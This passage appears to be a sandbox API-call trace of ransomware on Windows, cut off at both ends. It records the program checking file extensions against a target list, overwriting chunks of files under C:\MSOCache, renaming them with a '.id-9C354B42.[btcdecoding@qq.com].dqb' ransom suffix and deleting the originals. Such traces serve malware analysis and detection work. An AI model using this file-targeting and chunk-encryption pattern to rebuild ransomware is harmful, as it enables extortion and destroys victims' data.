hFile=0x180, lpBuffer=0x3970058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2dbfc38, lpOverlapped=0x0 | out: lpBuffer=0x3970058*, lpNumberOfBytesRead=0x2dbfc38*=0x40000, lpOverlapped=0x0) returned 1 [0047.412] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x36ec00, lpNewFilePointer=0x0, dwMoveMethod=0x2dbfc2c | out: lpNewFilePointer=0x0) returned 1 [0047.414] ReadFile (in: hFile=0x180, lpBuffer=0x39b0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2dbfc38, lpOverlapped=0x0 | out: lpBuffer=0x39b0058*, lpNumberOfBytesRead=0x2dbfc38*=0x40000, lpOverlapped=0x0) returned 1 [0047.428] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x2dbfc6c | out: lpNewFilePointer=0xffffffff) returned 1 [0047.428] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0xa0c400, lpNewFilePointer=0x0, dwMoveMethod=0x2dbfc2c | out: lpNewFilePointer=0x0) returned 1 [0047.428] ReadFile (in: hFile=0x180, lpBuffer=0x39f0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2dbfc38, lpOverlapped=0x0 | out: lpBuffer=0x39f0058*, lpNumberOfBytesRead=0x2dbfc38*=0x40000, lpOverlapped=0x0) returned 1 [0047.445] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2dbfec8 | out: lpNewFilePointer=0x0) returned 1 [0047.445] WriteFile (in: hFile=0x180, lpBuffer=0x3970020*, nNumberOfBytesToWrite=0xc0106, lpNumberOfBytesWritten=0x2dbfcb0, lpOverlapped=0x0 | out: lpBuffer=0x3970020*, lpNumberOfBytesWritten=0x2dbfcb0*=0xc0106, lpOverlapped=0x0) returned 1 [0047.461] SetEndOfFile (hFile=0x180) returned 1 [0047.461] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x40000) returned 0x3f14078 [0047.793] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2dbfc7c | out: lpNewFilePointer=0x0) returned 1 [0047.793] WriteFile (in: hFile=0x180, lpBuffer=0x3f14078*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2dbfc88, lpOverlapped=0x0 | out: lpBuffer=0x3f14078*, lpNumberOfBytesWritten=0x2dbfc88*=0x40000, lpOverlapped=0x0) returned 1 [0048.195] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x36ec00, lpNewFilePointer=0x0, dwMoveMethod=0x2dbfc7c | out: lpNewFilePointer=0x0) returned 1 [0048.195] WriteFile (in: hFile=0x180, lpBuffer=0x3f14078*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2dbfc88, lpOverlapped=0x0 | out: lpBuffer=0x3f14078*, lpNumberOfBytesWritten=0x2dbfc88*=0x40000, lpOverlapped=0x0) returned 1 [0048.197] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0xa0c400, lpNewFilePointer=0x0, dwMoveMethod=0x2dbfc7c | out: lpNewFilePointer=0x0) returned 1 [0048.197] WriteFile (in: hFile=0x180, lpBuffer=0x3f14078*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2dbfc88, lpOverlapped=0x0 | out: lpBuffer=0x3f14078*, lpNumberOfBytesWritten=0x2dbfc88*=0x40000, lpOverlapped=0x0) returned 1 [0048.202] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x3f14078 | out: hHeap=0x570000) returned 1 [0048.202] CloseHandle (hObject=0x180) returned 1 [0048.212] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.msi.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x2020) returned 1 [0048.212] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.msi") returned 76 [0048.212] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.msi") returned 76 [0048.212] lstrlenW (lpString=".doc") returned 4 [0048.212] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0048.212] lstrlenW (lpString=".docx") returned 5 [0048.212] lstrcmpiW (lpString1=".docx", lpString2="W.msi") returned -1 [0048.212] lstrlenW (lpString=".pdf") returned 4 [0048.212] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0048.212] lstrlenW (lpString=".xls") returned 4 [0048.212] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0048.212] lstrlenW (lpString=".xlsx") returned 5 [0048.212] lstrcmpiW (lpString1=".xlsx", lpString2="W.msi") returned -1 [0048.212] lstrlenW (lpString=".ppt") returned 4 [0048.212] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0048.212] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.msi") returned 76 [0048.212] lstrlenW (lpString=".zip") returned 4 [0048.212] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0048.213] lstrlenW (lpString=".rar") returned 4 [0048.213] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0048.213] lstrlenW (lpString=".bz2") returned 4 [0048.213] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0048.213] lstrlenW (lpString=".7z") returned 3 [0048.213] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0048.213] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.msi") returned 76 [0048.213] lstrlenW (lpString=".dbf") returned 4 [0048.213] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0048.213] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.msi") returned 76 [0048.213] lstrlenW (lpString=".1cd") returned 4 [0048.213] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0048.213] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.msi") returned 76 [0048.213] lstrlenW (lpString=".jpg") returned 4 [0048.213] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0048.213] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.msi") returned 76 [0048.213] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.msi") returned 76 [0048.213] lstrlenW (lpString=".doc") returned 4 [0048.213] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0048.213] lstrlenW (lpString=".docx") returned 5 [0048.213] lstrcmpiW (lpString1=".docx", lpString2="W.msi") returned -1 [0048.213] lstrlenW (lpString=".pdf") returned 4 [0048.213] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0048.213] lstrlenW (lpString=".xls") returned 4 [0048.213] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0048.213] lstrlenW (lpString=".xlsx") returned 5 [0048.213] lstrcmpiW (lpString1=".xlsx", lpString2="W.msi") returned -1 [0048.213] lstrlenW (lpString=".ppt") returned 4 [0048.213] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0048.213] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.msi") returned 76 [0048.213] lstrlenW (lpString=".zip") returned 4 [0048.213] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0048.213] lstrlenW (lpString=".rar") returned 4 [0048.214] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0048.214] lstrlenW (lpString=".bz2") returned 4 [0048.214] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0048.214] lstrlenW (lpString=".7z") returned 3 [0048.214] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0048.214] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.msi") returned 76 [0048.214] lstrlenW (lpString=".dbf") returned 4 [0048.214] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0048.214] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.msi") returned 76 [0048.214] lstrlenW (lpString=".1cd") returned 4 [0048.214] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0048.214] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.msi") returned 76 [0048.214] lstrlenW (lpString=".jpg") returned 4 [0048.214] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0048.214] lstrcmpiW (lpString1=".exe", lpString2=".dqb") returned 1 [0048.214] lstrlenW (lpString="setup.exe") returned 9 [0048.214] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\setup.exe" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\setup.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c [0048.214] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x2dbff1c | out: lpFileSize=0x2dbff1c*=1377656) returned 1 [0048.214] CloseHandle (hObject=0x21c) returned 1 [0048.215] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\setup.exe" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\setup.exe")) returned 0x2020 [0048.215] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\setup.exe.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\setup.exe.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0048.215] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\setup.exe" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\setup.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c [0048.215] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2dbfec8 | out: lpNewFilePointer=0x0) returned 1 [0048.215] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2dbfec8 | out: lpNewFilePointer=0x0) returned 1 [0048.215] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\setup.exe.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\setup.exe.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0048.215] GetLastError () returned 0x0 [0048.215] ReadFile (in: hFile=0x21c, lpBuffer=0x3970020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2dbfed4, lpOverlapped=0x0 | out: lpBuffer=0x3970020*, lpNumberOfBytesRead=0x2dbfed4*=0xffff0, lpOverlapped=0x0) returned 1 [0048.350] WriteFile (in: hFile=0x180, lpBuffer=0x3970020*, nNumberOfBytesToWrite=0xffff0, lpNumberOfBytesWritten=0x2dbfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3970020*, lpNumberOfBytesWritten=0x2dbfc9c*=0xffff0, lpOverlapped=0x0) returned 1 [0048.605] ReadFile (in: hFile=0x21c, lpBuffer=0x3970020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2dbfed4, lpOverlapped=0x0 | out: lpBuffer=0x3970020*, lpNumberOfBytesRead=0x2dbfed4*=0x50588, lpOverlapped=0x0) returned 1 [0048.619] WriteFile (in: hFile=0x180, lpBuffer=0x3970020*, nNumberOfBytesToWrite=0x50590, lpNumberOfBytesWritten=0x2dbfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3970020*, lpNumberOfBytesWritten=0x2dbfc9c*=0x50590, lpOverlapped=0x0) returned 1 [0048.626] ReadFile (in: hFile=0x21c, lpBuffer=0x3970020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2dbfed4, lpOverlapped=0x0 | out: lpBuffer=0x3970020*, lpNumberOfBytesRead=0x2dbfed4*=0x0, lpOverlapped=0x0) returned 1 [0048.626] WriteFile (in: hFile=0x180, lpBuffer=0x3970020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x2dbfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3970020*, lpNumberOfBytesWritten=0x2dbfc9c*=0xe6, lpOverlapped=0x0) returned 1 [0048.626] SetEndOfFile (hFile=0x180) returned 1 [0048.626] CloseHandle (hObject=0x180) returned 1 [0048.626] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2dbfec8 | out: lpNewFilePointer=0x0) returned 1 [0048.626] SetEndOfFile (hFile=0x21c) returned 1 [0048.629] CloseHandle (hObject=0x21c) returned 1 [0048.629] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\setup.exe.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x2020) returned 1 [0048.630] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\setup.exe" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\setup.exe")) returned 1 [0048.630] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\setup.exe") returned 72 [0048.630] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\setup.exe") returned 72 [0048.630] lstrlenW (lpString=".doc") returned 4 [0048.630] lstrcmpiW (lpString1=".doc", lpString2=".exe") returned -1 [0048.630] lstrlenW (lpString=".docx") returned 5 [0048.630] lstrcmpiW (lpString1=".docx", lpString2="p.exe") returned -1 [0048.630] lstrlenW (lpString=".pdf") returned 4 [0048.630] lstrcmpiW (lpString1=".pdf", lpString2=".exe") returned 1 [0048.630] lstrlenW (lpString=".xls") returned 4 [0048.630] lstrcmpiW (lpString1=".xls", lpString2=".exe") returned 1 [0048.630] lstrlenW (lpString=".xlsx") returned 5 [0048.630] lstrcmpiW (lpString1=".xlsx", lpString2="p.exe") returned -1 [0048.630] lstrlenW (lpString=".ppt") returned 4 [0048.630] lstrcmpiW (lpString1=".ppt", lpString2=".exe") returned 1 [0048.630] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\setup.exe") returned 72 [0048.630] lstrlenW (lpString=".zip") returned 4 [0048.630] lstrcmpiW (lpString1=".zip", lpString2=".exe") returned 1 [0048.630] lstrlenW (lpString=".rar") returned 4 [0048.630] lstrcmpiW (lpString1=".rar", lpString2=".exe") returned 1 [0048.630] lstrlenW (lpString=".bz2") returned 4 [0048.630] lstrcmpiW (lpString1=".bz2", lpString2=".exe") returned -1 [0048.630] lstrlenW (lpString=".7z") returned 3 [0048.630] lstrcmpiW (lpString1=".7z", lpString2="exe") returned -1 [0048.630] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\setup.exe") returned 72 [0048.630] lstrlenW (lpString=".dbf") returned 4 [0048.630] lstrcmpiW (lpString1=".dbf", lpString2=".exe") returned -1 [0048.631] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\setup.exe") returned 72 [0048.631] lstrlenW (lpString=".1cd") returned 4 [0048.631] lstrcmpiW (lpString1=".1cd", lpString2=".exe") returned -1 [0048.631] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\setup.exe") returned 72 [0048.631] lstrlenW (lpString=".jpg") returned 4 [0048.631] lstrcmpiW (lpString1=".jpg", lpString2=".exe") returned 1 [0048.631] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\setup.exe") returned 72 [0048.631] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\setup.exe") returned 72 [0048.631] lstrlenW (lpString=".doc") returned 4 [0048.631] lstrcmpiW (lpString1=".doc", lpString2=".exe") returned -1 [0048.631] lstrlenW (lpString=".docx") returned 5 [0048.631] lstrcmpiW (lpString1=".docx", lpString2="p.exe") returned -1 [0048.631] lstrlenW (lpString=".pdf") returned 4 [0048.631] lstrcmpiW (lpString1=".pdf", lpString2=".exe") returned 1 [0048.631] lstrlenW (lpString=".xls") returned 4 [0048.631] lstrcmpiW (lpString1=".xls", lpString2=".exe") returned 1 [0048.631] lstrlenW (lpString=".xlsx") returned 5 [0048.631] lstrcmpiW (lpString1=".xlsx", lpString2="p.exe") returned -1 [0048.631] lstrlenW (lpString=".ppt") returned 4 [0048.631] lstrcmpiW (lpString1=".ppt", lpString2=".exe") returned 1 [0048.631] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\setup.exe") returned 72 [0048.631] lstrlenW (lpString=".zip") returned 4 [0048.631] lstrcmpiW (lpString1=".zip", lpString2=".exe") returned 1 [0048.631] lstrlenW (lpString=".rar") returned 4 [0048.631] lstrcmpiW (lpString1=".rar", lpString2=".exe") returned 1 [0048.631] lstrlenW (lpString=".bz2") returned 4 [0048.631] lstrcmpiW (lpString1=".bz2", lpString2=".exe") returned -1 [0048.631] lstrlenW (lpString=".7z") returned 3 [0048.631] lstrcmpiW (lpString1=".7z", lpString2="exe") returned -1 [0048.631] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\setup.exe") returned 72 [0048.631] lstrlenW (lpString=".dbf") returned 4 [0048.631] lstrcmpiW (lpString1=".dbf", lpString2=".exe") returned -1 [0048.631] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\setup.exe") returned 72 [0048.631] lstrlenW (lpString=".1cd") returned 4 [0048.631] lstrcmpiW (lpString1=".1cd", lpString2=".exe") returned -1 [0048.631] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\setup.exe") returned 72 [0048.631] lstrlenW (lpString=".jpg") returned 4 [0048.632] lstrcmpiW (lpString1=".jpg", lpString2=".exe") returned 1 [0048.632] lstrcmpiW (lpString1=".dll", lpString2=".dqb") returned -1 [0048.632] lstrlenW (lpString="osetup.dll") returned 10 [0048.632] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\osetup.dll" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\osetup.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f8 [0048.799] GetFileSizeEx (in: hFile=0x1f8, lpFileSize=0x2dbff1c | out: lpFileSize=0x2dbff1c*=7378792) returned 1 [0048.799] CloseHandle (hObject=0x1f8) returned 1 [0048.799] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\osetup.dll" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\osetup.dll")) returned 0x2020 [0048.799] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\osetup.dll.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\osetup.dll.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0048.799] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\osetup.dll" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\osetup.dll"), lpNewFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\osetup.dll.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\osetup.dll.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 1 [0048.800] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\osetup.dll.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\osetup.dll.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f8 [0048.800] SetFilePointerEx (in: hFile=0x1f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2dbfc6c | out: lpNewFilePointer=0x0) returned 1 [0048.800] SetFilePointerEx (in: hFile=0x1f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2dbfc2c | out: lpNewFilePointer=0x0) returned 1 [0048.800] ReadFile (in: hFile=0x1f8, lpBuffer=0x3970058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2dbfc38, lpOverlapped=0x0 | out: lpBuffer=0x3970058*, lpNumberOfBytesRead=0x2dbfc38*=0x40000, lpOverlapped=0x0) returned 1 [0048.806] SetFilePointerEx (in: hFile=0x1f8, liDistanceToMove=0x2587cd, lpNewFilePointer=0x0, dwMoveMethod=0x2dbfc2c | out: lpNewFilePointer=0x0) returned 1 [0048.806] ReadFile (in: hFile=0x1f8, lpBuffer=0x39b0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2dbfc38, lpOverlapped=0x0 | out: lpBuffer=0x39b0058*, lpNumberOfBytesRead=0x2dbfc38*=0x40000, lpOverlapped=0x0) returned 1 [0048.809] SetFilePointerEx (in: hFile=0x1f8, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x2dbfc6c | out: lpNewFilePointer=0xffffffff) returned 1 [0048.809] SetFilePointerEx (in: hFile=0x1f8, liDistanceToMove=0x6c9768, lpNewFilePointer=0x0, dwMoveMethod=0x2dbfc2c | out: lpNewFilePointer=0x0) returned 1 [0048.809] ReadFile (in: hFile=0x1f8, lpBuffer=0x39f0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2dbfc38, lpOverlapped=0x0 | out: lpBuffer=0x39f0058*, lpNumberOfBytesRead=0x2dbfc38*=0x40000, lpOverlapped=0x0) returned 1 [0048.831] SetFilePointerEx (in: hFile=0x1f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2dbfec8 | out: lpNewFilePointer=0x0) returned 1 [0048.831] WriteFile (in: hFile=0x1f8, lpBuffer=0x3970020*, nNumberOfBytesToWrite=0xc0100, lpNumberOfBytesWritten=0x2dbfcb0, lpOverlapped=0x0 | out: lpBuffer=0x3970020*, lpNumberOfBytesWritten=0x2dbfcb0*=0xc0100, lpOverlapped=0x0) returned 1 [0049.079] SetEndOfFile (hFile=0x1f8) returned 1 [0049.080] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x40000) returned 0x3fc24e0 [0049.083] SetFilePointerEx (in: hFile=0x1f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2dbfc7c | out: lpNewFilePointer=0x0) returned 1 [0049.083] WriteFile (in: hFile=0x1f8, lpBuffer=0x3fc24e0*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2dbfc88, lpOverlapped=0x0 | out: lpBuffer=0x3fc24e0*, lpNumberOfBytesWritten=0x2dbfc88*=0x40000, lpOverlapped=0x0) returned 1 [0049.085] SetFilePointerEx (in: hFile=0x1f8, liDistanceToMove=0x2587cd, lpNewFilePointer=0x0, dwMoveMethod=0x2dbfc7c | out: lpNewFilePointer=0x0) returned 1 [0049.085] WriteFile (in: hFile=0x1f8, lpBuffer=0x3fc24e0*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2dbfc88, lpOverlapped=0x0 | out: lpBuffer=0x3fc24e0*, lpNumberOfBytesWritten=0x2dbfc88*=0x40000, lpOverlapped=0x0) returned 1 [0049.087] SetFilePointerEx (in: hFile=0x1f8, liDistanceToMove=0x6c9768, lpNewFilePointer=0x0, dwMoveMethod=0x2dbfc7c | out: lpNewFilePointer=0x0) returned 1 [0049.087] WriteFile (in: hFile=0x1f8, lpBuffer=0x3fc24e0*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2dbfc88, lpOverlapped=0x0 | out: lpBuffer=0x3fc24e0*, lpNumberOfBytesWritten=0x2dbfc88*=0x40000, lpOverlapped=0x0) returned 1 [0049.088] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x3fc24e0 | out: hHeap=0x570000) returned 1 [0049.088] CloseHandle (hObject=0x1f8) returned 1 [0049.088] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\osetup.dll.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x2020) returned 1 [0049.088] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 73 [0049.089] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 73 [0049.089] lstrlenW (lpString=".doc") returned 4 [0049.089] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0049.089] lstrlenW (lpString=".docx") returned 5 [0049.089] lstrcmpiW (lpString1=".docx", lpString2="p.dll") returned -1 [0049.089] lstrlenW (lpString=".pdf") returned 4 [0049.089] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0049.089] lstrlenW (lpString=".xls") returned 4 [0049.089] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0049.089] lstrlenW (lpString=".xlsx") returned 5 [0049.089] lstrcmpiW (lpString1=".xlsx", lpString2="p.dll") returned -1 [0049.089] lstrlenW (lpString=".ppt") returned 4 [0049.089] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0049.089] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 73 [0049.089] lstrlenW (lpString=".zip") returned 4 [0049.089] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0049.089] lstrlenW (lpString=".rar") returned 4 [0049.089] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0049.089] lstrlenW (lpString=".bz2") returned 4 [0049.089] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0049.089] lstrlenW (lpString=".7z") returned 3 [0049.089] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0049.089] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 73 [0049.089] lstrlenW (lpString=".dbf") returned 4 [0049.089] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0049.089] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 73 [0049.089] lstrlenW (lpString=".1cd") returned 4 [0049.089] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0049.089] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 73 [0049.089] lstrlenW (lpString=".jpg") returned 4 [0049.089] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0049.089] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 73 [0049.089] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 73 [0049.089] lstrlenW (lpString=".doc") returned 4 [0049.090] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0049.090] lstrlenW (lpString=".docx") returned 5 [0049.090] lstrcmpiW 